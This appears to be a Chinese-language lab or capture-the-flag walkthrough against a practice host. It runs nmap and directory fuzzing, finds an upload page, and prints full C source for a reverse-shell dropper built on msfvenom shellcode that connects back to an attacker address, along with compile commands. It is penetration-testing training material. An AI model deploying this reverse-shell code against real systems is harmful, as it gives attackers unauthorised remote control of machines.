命令:nmap -A -Pn 192.168.243.171
Nmap initial output
Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-07-17 01:03 EDT
Nmap scan report for 192.168.243.171
Host is up (0.21s latency).
Not shown: 948 filtered tcp ports (no-response), 49 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 0c:f7:57:49:fc:d4:4e:73:97:2c:25:a2:6a:36:5b:2c (RSA)
| 256 87:35:fd:bc:0a:69:ff:e7:7f:4c:54:c7:bd:29:1d:b9 (ECDSA)
|_ 256 2d:8b:f2:70:c4:57:44:62:d5:80:d6:0b:6e:31:a9:75 (ED25519)
**80/tcp open http Apache httpd 2.4.37 ((centos))**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CentOS \\xE6\\x8F\\x90\\xE4\\xBE\\x9B\\xE7\\x9A\\x84 Apache HTTP \\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE5\\x99\\xA8\\xE6\\xB5\\x8B\\xE8\\xAF\\x95\\xE9\\xA1\\xB5
|_http-server-header: Apache/2.4.37 (centos)
9090/tcp closed zeus-admin
Aggressive OS guesses: Linux 4.4 (92%), Linux 4.9 (91%), Linux 3.10 - 3.12 (90%), Linux 4.0 (89%), Linux 3.10 - 3.16 (88%), Linux 3.11 - 4.1 (88%), Linux 2.6.32 (88%), Linux 3.4 (88%), Linux 3.5 (88%), Linux 4.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 9090/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 192.168.243.172
2 205.23 ms 192.168.243.171
访问80端口,只显示apache的首页,需要fuzz一下可能的页面。但是很奇怪的是,用了好几个字典,gobuster,ffuf都没找到目标页面。
ffuf -u [<http://192.168.243.171/FUZZ>](<http://192.168.243.171/FUZZ>) -w /usr/share/dirb/wordlists/big.txt
ffuf -u [<http://192.168.243.171/FUZZ>](<http://192.168.243.171/FUZZ>) -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u [<http://192.168.243.171/>](<http://192.168.243.171/>) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
以上三个命令都没找到需要的,最后是gobuster指定后缀才找到
gobuster dir -u [<http://192.168.243.171>](<http://192.168.243.171/>) -w /usr/share/wordlists/dirb/common.txt -e -x html
访问:http://192.168.243.171/upload.html
存在上传,根据要求,编写如下代码:(参照教材P404)
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdlib.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>
// To compile:
// gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c
// gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl
// msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.243 LPORT=80 -f c
unsigned char buf[] =
"\\x6a\\x29\\x58\\x99\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x0f\\x05\\x48\\x97\\x48"
"\\xb9\\x02\\x00\\x00\\x50\\xc0\\xa8\\x31\\xf3\\x51\\x48\\x89\\xe6\\x6a\\x10"
"\\x5a\\x6a\\x2a\\x58\\x0f\\x05\\x6a\\x03\\x5e\\x48\\xff\\xce\\x6a\\x21\\x58"
"\\x0f\\x05\\x75\\xf6\\x6a\\x3b\\x58\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f"
"\\x73\\x68\\x00\\x53\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x0f\\x05";
int main(void)
{
printf("I love programming.");
// Fork a new thread based on the current one
if (fork() == 0)
{
// Execute shellcode in the new thread
intptr_t pagesize = sysconf(_SC_PAGESIZE);
// Make memory executable (required in libs)
if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) {
// Handle error
perror("mprotect");
return -1;
}
// Cast and execute
int (*ret)() = (int(*)())buf;
ret();
}
else
{
printf("[Hijacked] Returning from function...\\n");
}
// This shouldn't really execute
printf("[Hijacked] Returning from main...\\n");
return 3;
}
编译命令:gcc -Wall -fPIC -z execstack -o rev.elf rev.c
上传,得到返回的shell:
产生一个伪终端:
查找flag: